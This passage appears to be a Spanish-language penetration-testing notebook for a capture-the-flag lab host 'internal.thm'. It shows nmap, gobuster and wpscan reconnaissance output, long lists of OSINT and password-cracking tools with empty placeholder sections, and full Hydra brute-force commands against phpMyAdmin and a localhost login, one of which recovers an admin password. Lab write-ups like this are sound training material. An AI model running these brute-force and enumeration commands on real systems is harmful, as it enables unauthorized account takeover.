|       CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE    4.3     https://vulners.com/githubexploit/CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE*EXPLOIT*
|       CD48BD40-E52A-5A8B-AE27-B57C358BB0EE    4.3     https://vulners.com/githubexploit/CD48BD40-E52A-5A8B-AE27-B57C358BB0EE*EXPLOIT*
|       C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79    4.3     https://vulners.com/githubexploit/C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79*EXPLOIT*
|       C8799CA3-C88C-5B39-B291-2895BE0D9133    4.3     https://vulners.com/githubexploit/C8799CA3-C88C-5B39-B291-2895BE0D9133*EXPLOIT*
|       C0380E16-C468-5540-A427-7FE34E7CF36B    4.3     https://vulners.com/githubexploit/C0380E16-C468-5540-A427-7FE34E7CF36B*EXPLOIT*
|       BC027F41-02AD-5D71-A452-4DD62B0F1EE1    4.3     https://vulners.com/githubexploit/BC027F41-02AD-5D71-A452-4DD62B0F1EE1*EXPLOIT*
|       B946B2A1-2914-537A-BF26-94B48FC501B3    4.3     https://vulners.com/githubexploit/B946B2A1-2914-537A-BF26-94B48FC501B3*EXPLOIT*
|       B9151905-5395-5622-B789-E16B88F30C71    4.3     https://vulners.com/githubexploit/B9151905-5395-5622-B789-E16B88F30C71*EXPLOIT*
|       B58E6202-6D04-5CB0-8529-59713C0E13B8    4.3     https://vulners.com/githubexploit/B58E6202-6D04-5CB0-8529-59713C0E13B8*EXPLOIT*
|       B53D7077-1A2B-5640-9581-0196F6138301    4.3     https://vulners.com/githubexploit/B53D7077-1A2B-5640-9581-0196F6138301*EXPLOIT*
|       A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F    4.3     https://vulners.com/githubexploit/A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F*EXPLOIT*
|       9EE3F7E3-70E6-503E-9929-67FE3F3735A2    4.3     https://vulners.com/githubexploit/9EE3F7E3-70E6-503E-9929-67FE3F3735A2*EXPLOIT*
|       9D511461-7D24-5402-8E2A-58364D6E758F    4.3     https://vulners.com/githubexploit/9D511461-7D24-5402-8E2A-58364D6E758F*EXPLOIT*
|       9CEA663C-6236-5F45-B207-A873B971F988    4.3     https://vulners.com/githubexploit/9CEA663C-6236-5F45-B207-A873B971F988*EXPLOIT*
|       987C6FDB-3E70-5FF5-AB5B-D50065D27594    4.3     https://vulners.com/githubexploit/987C6FDB-3E70-5FF5-AB5B-D50065D27594*EXPLOIT*
|       789B6112-E84C-566E-89A7-82CC108EFCD9    4.3     https://vulners.com/githubexploit/789B6112-E84C-566E-89A7-82CC108EFCD9*EXPLOIT*
|       788F7DF8-01F3-5D13-9B3E-E4AA692153E6    4.3     https://vulners.com/githubexploit/788F7DF8-01F3-5D13-9B3E-E4AA692153E6*EXPLOIT*
|       749F952B-3ACF-56B2-809D-D66E756BE839    4.3     https://vulners.com/githubexploit/749F952B-3ACF-56B2-809D-D66E756BE839*EXPLOIT*
|       6E484197-456B-55DF-8D51-C2BB4925F45C    4.3     https://vulners.com/githubexploit/6E484197-456B-55DF-8D51-C2BB4925F45C*EXPLOIT*
|       68E78C64-D93A-5E8B-9DEA-4A8D826B474E    4.3     https://vulners.com/githubexploit/68E78C64-D93A-5E8B-9DEA-4A8D826B474E*EXPLOIT*
|       6758CFA9-271A-5E99-A590-E51F4E0C5046    4.3     https://vulners.com/githubexploit/6758CFA9-271A-5E99-A590-E51F4E0C5046*EXPLOIT*
|       674BA200-C494-57E6-B1B4-1672DDA15D3C    4.3     https://vulners.com/githubexploit/674BA200-C494-57E6-B1B4-1672DDA15D3C*EXPLOIT*
|       5A54F5DA-F9C1-508B-AD2D-3E45CD647D31    4.3     https://vulners.com/githubexploit/5A54F5DA-F9C1-508B-AD2D-3E45CD647D31*EXPLOIT*
|       4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F    4.3     https://vulners.com/githubexploit/4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F*EXPLOIT*
|       4C79D8E5-D595-5460-AA84-18D4CB93E8FC    4.3     https://vulners.com/githubexploit/4C79D8E5-D595-5460-AA84-18D4CB93E8FC*EXPLOIT*
|       4B44115D-85A3-5E62-B9A8-5F336C24673F    4.3     https://vulners.com/githubexploit/4B44115D-85A3-5E62-B9A8-5F336C24673F*EXPLOIT*
|       4013EC74-B3C1-5D95-938A-54197A58586D    4.3     https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D*EXPLOIT*
|       3CF66144-235E-5F7A-B889-113C11ABF150    4.3     https://vulners.com/githubexploit/3CF66144-235E-5F7A-B889-113C11ABF150*EXPLOIT*
|       379FCF38-0B4A-52EC-BE3E-408A0467BF20    4.3     https://vulners.com/githubexploit/379FCF38-0B4A-52EC-BE3E-408A0467BF20*EXPLOIT*
|       365CD0B0-D956-59D6-9500-965BF4017E2D    4.3     https://vulners.com/githubexploit/365CD0B0-D956-59D6-9500-965BF4017E2D*EXPLOIT*
|       2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F    4.3     https://vulners.com/githubexploit/2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F*EXPLOIT*
|       2B4FEB27-377B-557B-AE46-66D677D5DA1C    4.3     https://vulners.com/githubexploit/2B4FEB27-377B-557B-AE46-66D677D5DA1C*EXPLOIT*
|       1B75F2E2-5B30-58FA-98A4-501B91327D7F    4.3     https://vulners.com/githubexploit/1B75F2E2-5B30-58FA-98A4-501B91327D7F*EXPLOIT*
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       1337DAY-ID-33575        4.3     https://vulners.com/zdt/1337DAY-ID-33575        *EXPLOIT*
|       1145F3D1-0ECB-55AA-B25D-A26892116505    4.3     https://vulners.com/githubexploit/1145F3D1-0ECB-55AA-B25D-A26892116505*EXPLOIT*
|       108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2    4.3     https://vulners.com/githubexploit/108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2*EXPLOIT*
|       0BC014D0-F944-5E78-B5FA-146A8E5D0F8A    4.3     https://vulners.com/githubexploit/0BC014D0-F944-5E78-B5FA-146A8E5D0F8A*EXPLOIT*
|       06076ECD-3FB7-53EC-8572-ABBB20029812    4.3     https://vulners.com/githubexploit/06076ECD-3FB7-53EC-8572-ABBB20029812*EXPLOIT*
|       05403438-4985-5E78-A702-784E03F724D4    4.3     https://vulners.com/githubexploit/05403438-4985-5E78-A702-784E03F724D4*EXPLOIT*
|       00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08    4.3     https://vulners.com/githubexploit/00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08*EXPLOIT*
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|       CVE-2023-45802  2.6     https://vulners.com/cve/CVE-2023-45802
|       OSV:BIT-APACHE-2020-13938       2.1     https://vulners.com/osv/OSV:BIT-APACHE-2020-13938
|_      PACKETSTORM:152441      0.0     https://vulners.com/packetstorm/PACKETSTORM:152441      *EXPLOIT*
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 02:1F:8F:6A:E6:F3 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/24%OT=22%CT=1%CU=34142%PV=Y%DS=1%DC=D%G=Y%M=021F8F%T
OS:M=65D96143%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11N
OS:W7%O5=M2301ST11NW7%O6=M2301ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F
OS:4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T
OS:=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R
OS:=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.06 seconds

CONCLUSION: VEMNOS DOS PUERTOS ABIERTOS, EL 22 SSH Y EL 80 CON APACHE Y VEMOS QUE NOS DIO RUTAS A VARIOOS LOGINS QUE LOS VVEREMOS EN EL BROWSER: http-enum:
```
|   /blog/: Blog
|   /phpmyadmin/: phpMyAdmin
|   /wordpress/wp-login.php: Wordpress login page.
|_  /blog/wp-login.php: Wordpress login page
```

[x]GOBUSTER --------------------------------->https://www.kali.org/tools/gobuster/

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://internal.thm/
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://internal.thm/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2024/02/24 04:06:59 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/blog                 (Status: 301) [Size: 311] [--> http://internal.thm/blog/]
/index.html           (Status: 200) [Size: 10918]
/javascript           (Status: 301) [Size: 317] [--> http://internal.thm/javascript/]
/phpmyadmin           (Status: 301) [Size: 317] [--> http://internal.thm/phpmyadmin/]
/server-status        (Status: 403) [Size: 277]
/wordpress            (Status: 301) [Size: 316] [--> http://internal.thm/wordpress/]
===============================================================
2024/02/24 04:07:00 Finished
===============================================================



----------------------------------


┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://internal.thm/
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://internal.thm/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2024/02/24 04:13:03 Starting gobuster in directory enumeration mode
===============================================================
/blog                 (Status: 301) [Size: 311] [--> http://internal.thm/blog/]
/wordpress            (Status: 301) [Size: 316] [--> http://internal.thm/wordpress/]
/javascript           (Status: 301) [Size: 317] [--> http://internal.thm/javascript/]
/phpmyadmin           (Status: 301) [Size: 317] [--> http://internal.thm/phpmyadmin/]
/server-status        (Status: 403) [Size: 277]
Progress: 218148 / 220561 (98.91%)===============================================================
2024/02/24 04:13:27 Finished
===============================================================

CONCLUSION: LA BUSQUEDA E DIRECTORIOS EN LA URL CON COMMON.TXT NOS DIO LAS MISMAS RUTAS QUE YA VERIFICAMOS

WPSCAN👈 --------------------------------->https://wpscan.com/register/

┌──(root㉿kali)-[~]
└─# wpscan --url http://internal.thm/blog/    
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.252.207]
[+] Started: Tue Feb 27 23:28:26 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://internal.thm/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/? 
 v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2024-01-16T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 3.5
 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. 
 With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 
 2.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=================================================> (137 / 137) 
100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Feb 27 23:28:31 2024
[+] Requests Done: 171
[+] Cached Requests: 5
[+] Data Sent: 44.709 KB
[+] Data Received: 364.163 KB
[+] Memory used: 266.051 MB
[+] Elapsed time: 00:00:04

CONCLUSION: VOLVIMOS A CORROBORAR QUE TENEMOS EN LSO RESULTADOS DE WPSCAN EN UNA DE LAS URL QUE ENCONTRO VEMOS UN ARCHIVO CON LA INFO DEL POST PUBLICADO CON UN ID DE USUARIO 'ADMIN' EN LA SIGUIENTE URL: http://internal.thm/blog/index.php/comments/feed/ y mas info.

🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪

🕵️ INVESTIGACION OSINT ❌

INVESTIGACION OSINT

OSINT Framework👈 --------------------------------->https://osintframework.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Maltego👈 --------------------------------->https://www.kali.org/tools/maltego/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Maltego👈 --------------------------------->https://www.kali.org/tools/maltego/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Recon-ng👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Recon-ng👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
theHarvester👈 --------------------------------->https://www.kali.org/tools/theharvester/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
theHarvester👈 --------------------------------->https://www.kali.org/tools/theharvester/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SHODAN👈 --------------------------------->https://www.shodan.io/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OSRFrameworK👈 --------------------------------->https://www.kali.org/tools/osrframework/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SN0INT👈 --------------------------------->https://www.kali.org/tools/sn0int/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OSINTGRAM👈 --------------------------------->https://github.com/Datalux/Osintgram
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TWOSINT👈 --------------------------------->https://github.com/falkensmz/tw1tter0s1nt
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X FACEBOOK👈 --------------------------------->https://intelx.io/tools?tab=facebook
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X PERSONAS👈 --------------------------------->https://intelx.io/tools?tab=person
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X TELEFONOS👈 --------------------------------->https://intelx.io/tools?tab=telephone
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X Ubicación 2 Mapa👈 --------------------------------->https://intelx.io/tools?tab=location
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X IMAGEN👈 --------------------------------->https://intelx.io/tools?tab=image
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X NOMBRE DE USUARIO👈 --------------------------------->https://intelx.io/tools?tab=username
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X HASH INVERSA👈 --------------------------------->https://intelx.io/tools?tab=hash
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X ARCHIVOS👈 --------------------------------->https://intelx.io/tools?tab=file
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X VIN VEHICULOS👈 --------------------------------->https://intelx.io/tools?tab=vin
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩

⛓️ HASHES Y DESENCRIPTADOS ❌

HASHES Y DESENCRIPTADOS

JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HASHCAT👈 --------------------------------->https://www.kali.org/tools/hashcat/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RAINBOWCRACK👈 --------------------------------->https://www.kali.org/tools/rainbowcrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OPHCRACK👈 --------------------------------->https://www.kali.org/tools/ophcrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKSTATION👈 --------------------------------->https://crackstation.net/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AIRCRACK-NG👈 --------------------------------->https://www.kali.org/tools/aircrack-ng/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AIRCRACK-NG👈 --------------------------------->https://www.kali.org/tools/aircrack-ng/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CAIN Y ABEL👈 --------------------------------->https://github.com/xchwarze/Cain
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DAVEGRO1👈 --------------------------------->https://github.com/octomagon/davegrohl
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ElcomSoft Distributed Password Recovery👈 --------------------------------->https://www.elcomsoft.es/edpr.html
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACK RAR👈 --------------------------------->https://github.com/TermuxHackz/Crack-rar
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACK NINJA RAR👈 --------------------------------->https://github.com/SHUR1K-N/RARNinja-RAR-Password-Cracking-Utility
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NCRACK👈 --------------------------------->https://www.kali.org/tools/ncrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CEWL WORDLIST👈 --------------------------------->https://www.kali.org/tools/cewl/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRUNCH WORDLIST👈 --------------------------------->https://www.kali.org/tools/crunch/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
P4Iwordlists👈 --------------------------------->https://paimonhacking.gitbook.io/p4im0n_h4cking/curso-hacking-con-python/generador-de-wordlist-para-fuerza-bruta-p4iwordlist.py-1.2v
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BASE64 DECODE👈 --------------------------------->https://www.base64decode.org/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BASE64 DECODE👈 --------------------------------->https://www.base64decode.org/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨

💪 FUERZA BRUTA A LOGINS ✔️

FUERZA BRUTA A LOGINS

HYDRA --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL

┌──(root㉿kalipaimon)-[/home/paimon]
└─# hydra  -l root -P /usr/share/wordlists/rockyou.txt internal.thm http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1&target=index.php&token=1d5d2a2cccce33ccf1065db901abf9c9&Login:.*Access denied.*" -V

CONCLUSION: SEGUIR PROBANDO CON LOS OTROS LOGINS , POR AHORA CON ROOT NO FUNCIONO.

HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL


┌──(root㉿kalipaimon)-[/home/paimon]
└─# hydra  -l admin -P /usr/share/wordlists/rockyou.txt localhost -s 8083 http-post-form 
 "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login:.*Invalid 
 username or password.*" -V
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service 
organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-28 17:49:31
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries 
per task
[DATA] attacking http-post- 
form://localhost:8083/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login:.*Invalid username or password.*
[ATTEMPT] target localhost - login "admin" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "654321" - 17 of 14344399 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "michael" - 18 of 14344399 [child 4] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "ashley" - 19 of 14344399 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "qwerty" - 20 of 14344399 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "111111" - 21 of 14344399 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "iloveu" - 22 of 14344399 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "00000" - 171 of 14344399 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "fernando" - 172 of 14344399 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "pokemon" - 173 of 14344399 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "maggie" - 174 of 14344399 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "corazon" - 175 of 14344399 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "chicken" - 176 of 14344399 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "pepper" - 177 of 14344399 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "cristina" - 178 of 14344399 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "rainbow" - 179 of 14344399 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "kisses" - 180 of 14344399 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "manuel" - 181 of 14344399 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "myspace" - 182 of 14344399 [child 9] (0/0)
[8083][http-post-form] host: localhost   login: admin   password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-28 17:50:20

